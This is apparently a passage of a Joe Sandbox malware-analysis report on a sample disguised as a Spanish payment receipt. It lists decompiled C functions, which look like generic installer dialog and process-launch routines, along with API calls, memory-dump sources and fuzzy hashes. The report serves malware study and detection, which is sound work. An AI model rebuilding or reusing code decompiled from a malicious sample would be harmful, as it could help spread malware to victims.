                                        • SetFilePointer.KERNELBASE(?,00000000,00000000,00403088,?,?,00000006,00000008,0000000A), ref: 00403316
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.2800944994.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000002.00000002.2800912798.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801007500.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.000000000077C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.0000000000782000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.0000000000786000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.0000000000789000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.00000000007A4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.00000000007A6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.00000000007AB000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.00000000007B3000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.00000000007CE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2802534254.00000000007D0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2802534254.00000000007E0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2802534254.00000000007E9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2802534254.00000000007EF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_400000_rJUSTIFICANTEDEPAGO.jbxd
                                        Similarity
                                        • API ID: FilePointer
                                        • String ID:
                                        • API String ID: 973152223-0
                                        • Opcode ID: d5a77a7b91dde00220c09aa0a832f43c90240fc94845358d4caa889c1b96a79f
                                        • Instruction ID: c7266a3154837caca095f11e7777f6dda2278cbf6cff4ee7664d3894fc3aa091
                                        • Opcode Fuzzy Hash: d5a77a7b91dde00220c09aa0a832f43c90240fc94845358d4caa889c1b96a79f
                                        • Instruction Fuzzy Hash: ECB01271240300BFDA214F00DF09F057B21AB90700F10C034B348380F086711035EB0D
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 100%
                                        			E00404229(int _a4) {
                                        				long _t2;
                                        
                                        				_t2 = SendMessageW( *0x7a8a28, 0x28, _a4, "true"); // executed
                                        				return _t2;
                                        			}




                                        0x00404237
                                        0x0040423d

                                        APIs
                                        • SendMessageW.USER32(00000028,?,?,00404054), ref: 00404237
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.2800944994.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000002.00000002.2800912798.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801007500.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.000000000077C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.0000000000782000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.0000000000786000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.0000000000789000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.00000000007A4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.00000000007A6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.00000000007AB000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.00000000007B3000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.00000000007CE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2802534254.00000000007D0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2802534254.00000000007E0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2802534254.00000000007E9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2802534254.00000000007EF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_400000_rJUSTIFICANTEDEPAGO.jbxd
                                        Similarity
                                        • API ID: MessageSend
                                        • String ID:
                                        • API String ID: 3850602802-0
                                        • Opcode ID: f360a53124e97c409135d1b53ccadec94ff58fec8389da7a5f3de8c8d06ef766
                                        • Instruction ID: 5dee82f2d739acac93035fb571c052082ac1606baee7bb158d490297d0aa81d3
                                        • Opcode Fuzzy Hash: f360a53124e97c409135d1b53ccadec94ff58fec8389da7a5f3de8c8d06ef766
                                        • Instruction Fuzzy Hash: 99B09236190A00AADE614B40DE49F457A62A7A8701F00C029B240640B0CAB200A0DB09
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 100%
                                        			E00404216(int _a4) {
                                        				int _t2;
                                        
                                        				_t2 = EnableWindow( *0x7a1f1c, _a4); // executed
                                        				return _t2;
                                        			}




                                        0x00404220
                                        0x00404226

                                        APIs
                                        • KiUserCallbackDispatcher.NTDLL(?,00403FED), ref: 00404220
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.2800944994.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000002.00000002.2800912798.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801007500.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.000000000077C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.0000000000782000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.0000000000786000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.0000000000789000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.00000000007A4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.00000000007A6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.00000000007AB000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.00000000007B3000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.00000000007CE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2802534254.00000000007D0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2802534254.00000000007E0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2802534254.00000000007E9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2802534254.00000000007EF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_400000_rJUSTIFICANTEDEPAGO.jbxd
                                        Similarity
                                        • API ID: CallbackDispatcherUser
                                        • String ID:
                                        • API String ID: 2492992576-0
                                        • Opcode ID: efc6552eadcfffb9f020cd3683497eb6feb0237cfd1954b00ec8dcd11a4bd103
                                        • Instruction ID: 2198674f4dd135e02f2a8ae7056ebba5a8e761495b22eeaea90ee2a366c7106d
                                        • Opcode Fuzzy Hash: efc6552eadcfffb9f020cd3683497eb6feb0237cfd1954b00ec8dcd11a4bd103
                                        • Instruction Fuzzy Hash: 0AA002754455409FDF015B50EF048057A61B7E5741B61C469A25551074C7354461EB19
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 78%
                                        			E00401F00() {
                                        				void* _t9;
                                        				intOrPtr _t13;
                                        				void* _t15;
                                        				void* _t17;
                                        				void* _t20;
                                        				void* _t22;
                                        
                                        				_t19 = E00402C37(_t15);
                                        				E004052C3(0xffffffeb, _t7); // executed
                                        				_t9 = E00405844(_t19); // executed
                                        				_t20 = _t9;
                                        				if(_t20 == _t15) {
                                        					 *((intOrPtr*)(_t22 - 4)) = 1;
                                        				} else {
                                        					if( *((intOrPtr*)(_t22 - 0x20)) != _t15) {
                                        						_t13 = E004066EA(_t17, _t20);
                                        						if( *((intOrPtr*)(_t22 - 0x24)) < _t15) {
                                        							if(_t13 != _t15) {
                                        								 *((intOrPtr*)(_t22 - 4)) = 1;
                                        							}
                                        						} else {
                                        							E004061A6( *((intOrPtr*)(_t22 - 0xc)), _t13);
                                        						}
                                        					}
                                        					_push(_t20);
                                        					CloseHandle();
                                        				}
                                        				 *0x7a8ac8 =  *0x7a8ac8 +  *((intOrPtr*)(_t22 - 4));
                                        				return 0;
                                        			}









                                        0x00401f06
                                        0x00401f0b
                                        0x00401f11
                                        0x00401f16
                                        0x00401f1a
                                        0x00402885
                                        0x00401f20
                                        0x00401f23
                                        0x00401f26
                                        0x00401f2e
                                        0x00401f3d
                                        0x00401f3f
                                        0x00401f3f
                                        0x00401f30
                                        0x00401f34
                                        0x00401f34
                                        0x00401f2e
                                        0x00401f46
                                        0x00401f47
                                        0x00401f47
                                        0x00402ac2
                                        0x00402ace

                                        APIs
                                          • Part of subcall function 004052C3: lstrlenW.KERNEL32(007A0F00,00000000,007924D8,765823A0,?,?,?,?,?,?,?,?,?,0040323B,00000000,?), ref: 004052FB
                                          • Part of subcall function 004052C3: lstrlenW.KERNEL32(0040323B,007A0F00,00000000,007924D8,765823A0,?,?,?,?,?,?,?,?,?,0040323B,00000000), ref: 0040530B
                                          • Part of subcall function 004052C3: lstrcatW.KERNEL32(007A0F00,0040323B), ref: 0040531E
                                          • Part of subcall function 004052C3: SetWindowTextW.USER32(007A0F00,007A0F00), ref: 00405330
                                          • Part of subcall function 004052C3: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405356
                                          • Part of subcall function 004052C3: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405370
                                          • Part of subcall function 004052C3: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040537E
                                          • Part of subcall function 00405844: CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,007A4F28,Error launching installer), ref: 0040586D
                                          • Part of subcall function 00405844: CloseHandle.KERNEL32(?), ref: 0040587A
                                        • CloseHandle.KERNEL32(?,?,?,?,?,?,?), ref: 00401F47
                                          • Part of subcall function 004066EA: WaitForSingleObject.KERNEL32(?,00000064,00000000,00000000,?,?,00401EFB,?,?,?,?,?,?), ref: 004066FB
                                          • Part of subcall function 004066EA: GetExitCodeProcess.KERNEL32(?,?), ref: 0040671D
                                          • Part of subcall function 004061A6: wsprintfW.USER32 ref: 004061B3
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.2800944994.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000002.00000002.2800912798.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801007500.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.000000000077C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.0000000000782000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.0000000000786000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.0000000000789000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.00000000007A4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.00000000007A6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.00000000007AB000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.00000000007B3000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.00000000007CE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2802534254.00000000007D0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2802534254.00000000007E0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2802534254.00000000007E9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2802534254.00000000007EF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_400000_rJUSTIFICANTEDEPAGO.jbxd
                                        Similarity
                                        • API ID: MessageSend$CloseHandleProcesslstrlen$CodeCreateExitObjectSingleTextWaitWindowlstrcatwsprintf
                                        • String ID:
                                        • API String ID: 2972824698-0
                                        • Opcode ID: 9645f34456babddffe365cced8570490a305f219a8dabac6956c86f0a67676f6
                                        • Instruction ID: 4cd38a76db1ec19436dc127f491775ffefe8ed04147ea9162fb687742d6809c2
                                        • Opcode Fuzzy Hash: 9645f34456babddffe365cced8570490a305f219a8dabac6956c86f0a67676f6
                                        • Instruction Fuzzy Hash: 63F09032905111DBCF20FBA19E849DE66B4AF01328B25457BF501F61D1C77C4E518AAE
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 96%
                                        			E00404C3F(struct HWND__* _a4, int _a8, signed int _a12, int _a16) {
                                        				struct HWND__* _v8;
                                        				struct HWND__* _v12;
                                        				signed int _v16;
                                        				signed int _v20;
                                        				intOrPtr _v24;
                                        				signed char* _v28;
                                        				long _v32;
                                        				signed int _v40;
                                        				long _v44;
                                        				signed int* _v56;
                                        				signed char* _v60;
                                        				signed int _v64;
                                        				long _v68;
                                        				void* _v72;
                                        				intOrPtr _v76;
                                        				intOrPtr _v80;
                                        				void* _v84;
                                        				void* __ebx;
                                        				void* __edi;
                                        				void* __esi;
                                        				signed int _t192;
                                        				intOrPtr _t195;
                                        				intOrPtr _t197;
                                        				long _t201;
                                        				signed int _t205;
                                        				signed int _t216;
                                        				void* _t219;
                                        				void* _t220;
                                        				int _t226;
                                        				signed int _t231;
                                        				signed int _t232;
                                        				signed int _t233;
                                        				signed int _t239;
                                        				signed int _t241;
                                        				signed char _t242;
                                        				signed char _t248;
                                        				void* _t252;
                                        				void* _t254;
                                        				signed char* _t270;
                                        				signed char _t271;
                                        				long _t276;
                                        				int _t282;
                                        				signed int _t283;
                                        				long _t284;
                                        				signed int _t287;
                                        				signed int _t294;
                                        				signed char* _t302;
                                        				struct HWND__* _t306;
                                        				int _t307;
                                        				signed int* _t308;
                                        				int _t309;
                                        				long _t310;
                                        				signed int _t311;
                                        				void* _t313;
                                        				long _t314;
                                        				int _t315;
                                        				signed int _t316;
                                        				void* _t318;
                                        
                                        				_t306 = _a4;
                                        				_v12 = GetDlgItem(_t306, 0x3f9);
                                        				_v8 = GetDlgItem(_t306, 0x408);
                                        				_t318 = SendMessageW;
                                        				_v20 =  *0x7a8a68;
                                        				_t282 = 0;
                                        				_v24 =  *0x7a8a34 + 0x94;
                                        				if(_a8 != 0x110) {
                                        					L23:
                                        					if(_a8 != 0x405) {
                                        						_t285 = _a16;
                                        					} else {
                                        						_a12 = _t282;
                                        						_t285 = 1;
                                        						_a8 = 0x40f;
                                        						_a16 = 1;
                                        					}
                                        					if(_a8 == 0x4e || _a8 == 0x413) {
                                        						_v16 = _t285;
                                        						if(_a8 == 0x413 ||  *((intOrPtr*)(_t285 + 4)) == 0x408) {
                                        							if(( *0x7a8a3d & 0x00000002) != 0) {
                                        								L41:
                                        								if(_v16 != _t282) {
                                        									_t231 = _v16;
                                        									if( *((intOrPtr*)(_t231 + 8)) == 0xfffffe3d) {
                                        										SendMessageW(_v8, 0x419, _t282,  *(_t231 + 0x5c));
                                        									}
                                        									_t232 = _v16;
                                        									if( *((intOrPtr*)(_t232 + 8)) == 0xfffffe39) {
                                        										_t285 = _v20;
                                        										_t233 =  *(_t232 + 0x5c);
                                        										if( *((intOrPtr*)(_t232 + 0xc)) != 2) {
                                        											 *(_t233 * 0x818 + _t285 + 8) =  *(_t233 * 0x818 + _t285 + 8) & 0xffffffdf;
                                        										} else {
                                        											 *(_t233 * 0x818 + _t285 + 8) =  *(_t233 * 0x818 + _t285 + 8) | 0x00000020;
                                        										}
                                        									}
                                        								}
                                        								goto L48;
                                        							}
                                        							if(_a8 == 0x413) {
                                        								L33:
                                        								_t285 = 0 | _a8 != 0x00000413;
                                        								_t239 = E00404B8D(_v8, _a8 != 0x413);
                                        								_t311 = _t239;
                                        								if(_t311 >= _t282) {
                                        									_t88 = _v20 + 8; // 0x8
                                        									_t285 = _t239 * 0x818 + _t88;
                                        									_t241 =  *_t285;
                                        									if((_t241 & 0x00000010) == 0) {
                                        										if((_t241 & 0x00000040) == 0) {
                                        											_t242 = _t241 ^ 0x00000001;
                                        										} else {
                                        											_t248 = _t241 ^ 0x00000080;
                                        											if(_t248 >= 0) {
                                        												_t242 = _t248 & 0x000000fe;
                                        											} else {
                                        												_t242 = _t248 | 0x00000001;
                                        											}
                                        										}
                                        										 *_t285 = _t242;
                                        										E0040117D(_t311);
                                        										_a12 = _t311 + 1;
                                        										_a16 =  !( *0x7a8a3c) >> 0x00000008 & 0x00000001;
                                        										_a8 = 0x40f;
                                        									}
                                        								}
                                        								goto L41;
                                        							}
                                        							_t285 = _a16;
                                        							if( *((intOrPtr*)(_a16 + 8)) != 0xfffffffe) {
                                        								goto L41;
                                        							}
                                        							goto L33;
                                        						} else {
                                        							goto L48;
                                        						}
                                        					} else {
                                        						L48:
                                        						if(_a8 != 0x111) {
                                        							L56:
                                        							if(_a8 == 0x200) {
                                        								SendMessageW(_v8, 0x200, _t282, _t282);
                                        							}
                                        							if(_a8 == 0x40b) {
                                        								_t219 =  *0x7a1f04;
                                        								if(_t219 != _t282) {
                                        									ImageList_Destroy(_t219);
                                        								}
                                        								_t220 =  *0x7a1f18;
                                        								if(_t220 != _t282) {
                                        									GlobalFree(_t220);
                                        								}
                                        								 *0x7a1f04 = _t282;
                                        								 *0x7a1f18 = _t282;
                                        								 *0x7a8aa0 = _t282;
                                        							}
                                        							if(_a8 != 0x40f) {
                                        								L88:
                                        								if(_a8 == 0x420 && ( *0x7a8a3d & 0x00000001) != 0) {
                                        									_t307 = (0 | _a16 == 0x00000020) << 3;
                                        									ShowWindow(_v8, _t307);
                                        									ShowWindow(GetDlgItem(_a4, 0x3fe), _t307);
                                        								}
                                        								goto L91;
                                        							} else {
                                        								E004011EF(_t285, _t282, _t282);
                                        								_t192 = _a12;
                                        								if(_t192 != _t282) {
                                        									if(_t192 != 0xffffffff) {
                                        										_t192 = _t192 - 1;
                                        									}
                                        									_push(_t192);
                                        									_push(8);
                                        									E00404C0D();
                                        								}
                                        								if(_a16 == _t282) {
                                        									L75:
                                        									E004011EF(_t285, _t282, _t282);
                                        									_v32 =  *0x7a1f18;
                                        									_t195 =  *0x7a8a68;
                                        									_v60 = 0xf030;
                                        									_v20 = _t282;
                                        									if( *0x7a8a6c <= _t282) {
                                        										L86:
                                        										InvalidateRect(_v8, _t282, "true");
                                        										_t197 =  *0x7a79fc; // 0x880d16
                                        										if( *((intOrPtr*)(_t197 + 0x10)) != _t282) {
                                        											E00404B48(0x3ff, 0xfffffffb, E00404B60(5));
                                        										}
                                        										goto L88;
                                        									}
                                        									_t308 = _t195 + 8;
                                        									do {
                                        										_t201 =  *((intOrPtr*)(_v32 + _v20 * 4));
                                        										if(_t201 != _t282) {
                                        											_t287 =  *_t308;
                                        											_v68 = _t201;
                                        											_v72 = 8;
                                        											if((_t287 & 0x00000001) != 0) {
                                        												_v72 = 9;
                                        												_v56 =  &(_t308[4]);
                                        												_t308[0] = _t308[0] & 0x000000fe;
                                        											}
                                        											if((_t287 & 0x00000040) == 0) {
                                        												_t205 = (_t287 & 0x00000001) + 1;
                                        												if((_t287 & 0x00000010) != 0) {
                                        													_t205 = _t205 + 3;
                                        												}
                                        											} else {
                                        												_t205 = 3;
                                        											}
                                        											_v64 = (_t205 << 0x0000000b | _t287 & 0x00000008) + (_t205 << 0x0000000b | _t287 & 0x00000008) | _t287 & 0x00000020;
                                        											SendMessageW(_v8, 0x1102, (_t287 >> 0x00000005 & 0x00000001) + 1, _v68);
                                        											SendMessageW(_v8, 0x113f, _t282,  &_v72);
                                        										}
                                        										_v20 = _v20 + 1;
                                        										_t308 =  &(_t308[0x206]);
                                        									} while (_v20 <  *0x7a8a6c);
                                        									goto L86;
                                        								} else {
                                        									_t309 = E004012E2( *0x7a1f18);
                                        									E00401299(_t309);
                                        									_t216 = 0;
                                        									_t285 = 0;
                                        									if(_t309 <= _t282) {
                                        										L74:
                                        										SendMessageW(_v12, 0x14e, _t285, _t282);
                                        										_a16 = _t309;
                                        										_a8 = 0x420;
                                        										goto L75;
                                        									} else {
                                        										goto L71;
                                        									}
                                        									do {
                                        										L71:
                                        										if( *((intOrPtr*)(_v24 + _t216 * 4)) != _t282) {
                                        											_t285 = _t285 + 1;
                                        										}
                                        										_t216 = _t216 + 1;
                                        									} while (_t216 < _t309);
                                        									goto L74;
                                        								}
                                        							}
                                        						}
                                        						if(_a12 != 0x3f9 || _a12 >> 0x10 != 1) {
                                        							goto L91;
                                        						} else {
                                        							_t226 = SendMessageW(_v12, 0x147, _t282, _t282);
                                        							if(_t226 == 0xffffffff) {
                                        								goto L91;
                                        							}
                                        							_t310 = SendMessageW(_v12, 0x150, _t226, _t282);
                                        							if(_t310 == 0xffffffff ||  *((intOrPtr*)(_v24 + _t310 * 4)) == _t282) {
                                        								_t310 = 0x20;
                                        							}
                                        							E00401299(_t310);
                                        							SendMessageW(_a4, 0x420, _t282, _t310);
                                        							_a12 = _a12 | 0xffffffff;
                                        							_a16 = _t282;
                                        							_a8 = 0x40f;
                                        							goto L56;
                                        						}
                                        					}
                                        				} else {
                                        					_v32 = 0;
                                        					_v16 = 2;
                                        					 *0x7a8aa0 = _t306;
                                        					 *0x7a1f18 = GlobalAlloc(0x40,  *0x7a8a6c << 2);
                                        					_t252 = LoadBitmapW( *0x7a8a20, 0x6e);
                                        					 *0x7a1f0c =  *0x7a1f0c | 0xffffffff;
                                        					_t313 = _t252;
                                        					 *0x7a1f14 = SetWindowLongW(_v8, 0xfffffffc, E00405237);
                                        					_t254 = ImageList_Create(0x10, 0x10, 0x21, 6, 0);
                                        					 *0x7a1f04 = _t254;
                                        					ImageList_AddMasked(_t254, _t313, 0xff00ff);
                                        					SendMessageW(_v8, 0x1109, 2,  *0x7a1f04);
                                        					if(SendMessageW(_v8, 0x111c, 0, 0) < 0x10) {
                                        						SendMessageW(_v8, 0x111b, 0x10, 0);
                                        					}
                                        					DeleteObject(_t313);
                                        					_t314 = 0;
                                        					do {
                                        						_t260 =  *((intOrPtr*)(_v24 + _t314 * 4));
                                        						if( *((intOrPtr*)(_v24 + _t314 * 4)) != _t282) {
                                        							if(_t314 != 0x20) {
                                        								_v16 = _t282;
                                        							}
                                        							SendMessageW(_v12, 0x151, SendMessageW(_v12, 0x143, _t282, E00406281(_t282, _t314, _t318, _t282, _t260)), _t314);
                                        						}
                                        						_t314 = _t314 + 1;
                                        					} while (_t314 < 0x21);
                                        					_t315 = _a16;
                                        					_t283 = _v16;
                                        					_push( *((intOrPtr*)(_t315 + 0x30 + _t283 * 4)));
                                        					_push(0x15);
                                        					E004041F4(_a4);
                                        					_push( *((intOrPtr*)(_t315 + 0x34 + _t283 * 4)));
                                        					_push(0x16);
                                        					E004041F4(_a4);
                                        					_t316 = 0;
                                        					_t284 = 0;
                                        					if( *0x7a8a6c <= 0) {
                                        						L19:
                                        						SetWindowLongW(_v8, 0xfffffff0, GetWindowLongW(_v8, 0xfffffff0) & 0x000000fb);
                                        						goto L20;
                                        					} else {
                                        						_t302 = _v20 + 8;
                                        						_v28 = _t302;
                                        						do {
                                        							_t270 =  &(_t302[0x10]);
                                        							if( *_t270 != 0) {
                                        								_v60 = _t270;
                                        								_t271 =  *_t302;
                                        								_t294 = 0x20;
                                        								_v84 = _t284;
                                        								_v80 = 0xffff0002;
                                        								_v76 = 0xd;
                                        								_v64 = _t294;
                                        								_v40 = _t316;
                                        								_v68 = _t271 & _t294;
                                        								if((_t271 & 0x00000002) == 0) {
                                        									if((_t271 & 0x00000004) == 0) {
                                        										 *( *0x7a1f18 + _t316 * 4) = SendMessageW(_v8, 0x1132, 0,  &_v84);
                                        									} else {
                                        										_t284 = SendMessageW(_v8, 0x110a, 3, _t284);
                                        									}
                                        								} else {
                                        									_v76 = 0x4d;
                                        									_v44 = 1;
                                        									_t276 = SendMessageW(_v8, 0x1132, 0,  &_v84);
                                        									_v32 = 1;
                                        									 *( *0x7a1f18 + _t316 * 4) = _t276;
                                        									_t284 =  *( *0x7a1f18 + _t316 * 4);
                                        								}
                                        							}
                                        							_t316 = _t316 + 1;
                                        							_t302 =  &(_v28[0x818]);
                                        							_v28 = _t302;
                                        						} while (_t316 <  *0x7a8a6c);
                                        						if(_v32 != 0) {
                                        							L20:
                                        							if(_v16 != 0) {
                                        								E00404229(_v8);
                                        								_t282 = 0;
                                        								goto L23;
                                        							} else {
                                        								ShowWindow(_v12, 5);
                                        								E00404229(_v12);
                                        								L91:
                                        								return E0040425B(_a8, _a12, _a16);
                                        							}
                                        						}
                                        						goto L19;
                                        					}
                                        				}
                                        			}





























































                                        0x00404c4e
                                        0x00404c5f
                                        0x00404c64
                                        0x00404c6c
                                        0x00404c72
                                        0x00404c7a
                                        0x00404c88
                                        0x00404c8b
                                        0x00404eac
                                        0x00404eb3
                                        0x00404ec7
                                        0x00404eb5
                                        0x00404eb7
                                        0x00404eba
                                        0x00404ebb
                                        0x00404ec2
                                        0x00404ec2
                                        0x00404ed3
                                        0x00404ee1
                                        0x00404ee4
                                        0x00404efa
                                        0x00404f6f
                                        0x00404f72
                                        0x00404f74
                                        0x00404f7e
                                        0x00404f8c
                                        0x00404f8c
                                        0x00404f8e
                                        0x00404f98
                                        0x00404f9e
                                        0x00404fa1
                                        0x00404fa4
                                        0x00404fbf
                                        0x00404fa6
                                        0x00404fb0
                                        0x00404fb0
                                        0x00404fa4
                                        0x00404f98
                                        0x00000000
                                        0x00404f72
                                        0x00404eff
                                        0x00404f0a
                                        0x00404f0f
                                        0x00404f16
                                        0x00404f1b
                                        0x00404f1f
                                        0x00404f2a
                                        0x00404f2a
                                        0x00404f2e
                                        0x00404f32
                                        0x00404f36
                                        0x00404f49
                                        0x00404f38
                                        0x00404f38
                                        0x00404f3f
                                        0x00404f45
                                        0x00404f41
                                        0x00404f41
                                        0x00404f41
                                        0x00404f3f
                                        0x00404f4d
                                        0x00404f4f
                                        0x00404f62
                                        0x00404f65
                                        0x00404f68
                                        0x00404f68
                                        0x00404f32
                                        0x00000000
                                        0x00404f1f
                                        0x00404f01
                                        0x00404f08
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x00404fc2
                                        0x00404fc2
                                        0x00404fc9
                                        0x0040503a
                                        0x00405042
                                        0x0040504a
                                        0x0040504a
                                        0x00405053
                                        0x00405055
                                        0x0040505c
                                        0x0040505f
                                        0x0040505f
                                        0x00405065
                                        0x0040506c
                                        0x0040506f
                                        0x0040506f
                                        0x00405075
                                        0x0040507b
                                        0x00405081
                                        0x00405081
                                        0x0040508e
                                        0x004051e4
                                        0x004051eb
                                        0x00405208
                                        0x0040520e
                                        0x00405220
                                        0x00405220
                                        0x00000000
                                        0x00405094
                                        0x00405096
                                        0x0040509b
                                        0x004050a0
                                        0x004050a5
                                        0x004050a7
                                        0x004050a7
                                        0x004050a8
                                        0x004050a9
                                        0x004050ab
                                        0x004050ab
                                        0x004050b3
                                        0x004050f4
                                        0x004050f6
                                        0x00405106
                                        0x00405109
                                        0x0040510e
                                        0x00405115
                                        0x00405118
                                        0x004051ba
                                        0x004051c0
                                        0x004051c6
                                        0x004051ce
                                        0x004051df
                                        0x004051df
                                        0x00000000
                                        0x004051ce
                                        0x0040511e
                                        0x00405121
                                        0x00405127
                                        0x0040512c
                                        0x0040512e
                                        0x00405130
                                        0x00405136
                                        0x0040513d
                                        0x00405142
                                        0x00405149
                                        0x0040514c
                                        0x0040514c
                                        0x00405153
                                        0x0040515f
                                        0x00405163
                                        0x00405165
                                        0x00405165
                                        0x00405155
                                        0x00405157
                                        0x00405157
                                        0x00405185
                                        0x00405191
                                        0x004051a0
                                        0x004051a0
                                        0x004051a2
                                        0x004051a5
                                        0x004051ae
                                        0x00000000
                                        0x004050b5
                                        0x004050c0
                                        0x004050c3
                                        0x004050c8
                                        0x004050ca
